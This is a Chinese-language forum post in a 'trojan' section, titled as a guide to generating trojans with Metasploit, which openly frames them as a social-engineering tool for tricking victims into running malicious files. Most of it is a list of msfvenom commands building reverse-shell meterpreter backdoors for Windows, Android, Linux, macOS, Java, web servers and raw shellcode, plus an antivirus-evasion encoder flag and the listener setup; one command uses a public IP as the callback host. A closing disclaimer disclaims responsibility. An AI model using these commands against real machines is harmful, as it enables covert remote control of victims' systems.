• 中文
    • English
  • 注册
  • 木马病毒 木马病毒 关注:24 内容:7

    Metasploit 生成木马

  • 查看作者
  • 打赏作者
    • 2
    • 木马病毒
    • 老司机

      Metasploit 生成木马

          Metasploit 生成木马

      0x01 简介
      在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马在社会工程学中是我们经常使用的手段,本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马。
      0x02 使用msfvenom生成木马
      msfvenom -p windows/meterpreter/reverse_tcp lhost=103.46.128.46 lport=55497 -f exe > /home/anonymous/文件名.exe
      代码注释:
      -p Payload架构
      -f 木马文件格式
      >文件输出/放置路径
      lhost kali本机ip地址
      lport kali本机端口号
      0x03 使用msfvenom生成各种木马
      1.  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe    //exe文件

      2.  msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > apk.apk        //安卓

      3.  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -a x86 -f dll > shell.dll       // DLL后门

      4.  msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 W > text.jar           //Java后门

      5.  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 R >> /root/Desktop/test   //linux 后门   需要把test加权限 chmod +x ./test

      6.  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f raw > shell.py    //python

      7.  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f raw > shell.php   //PHP

      8.  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f asp > shell.asp  //asp

      9.  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f aspx > shell.aspx  //aspx

      10.  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f c > shellcode.c   //生成C语言shellcode

      11.  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f csharp > shellcode.txt   //生成C#语言shellcode

      12.msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.7 LPORT=4444 -f raw -o shell.sh  //生成bash文件(可用于Unix系统)

      13.msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho  //生成MacOS的后门

      14.msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf  //生成Linux的后门

      ————————————————————————————————

      如果要使用编码免杀加上参数  -e x86/shikata_ga_nai

      监听利用模块:

      use exploit/multi/handler      
      set PAYLOAD <Payload name>  
      set LHOST <LHOST value>
      set LPORT <LPORT value>
      exploit

      注意:这些东西不是教你们触犯法律,而希望是抱着学习的态度去研究网络安全。如果你使用这些方法给对方造成的不良后果,后果自负!本人一概不负责!!!

      大佬
      神隐会员
      官方
      靓号:666666
      打赏了480金币
      回复
      老司机

      We are Anonymous.

      We are Legion.

      We do not forgive.

      We do not forget.

      EXPECT US.

      回复

      请登录之后再进行评论

      登录
    • 发布
    • 实时动态
    • 任务
    • 帖子间隔 侧栏位置: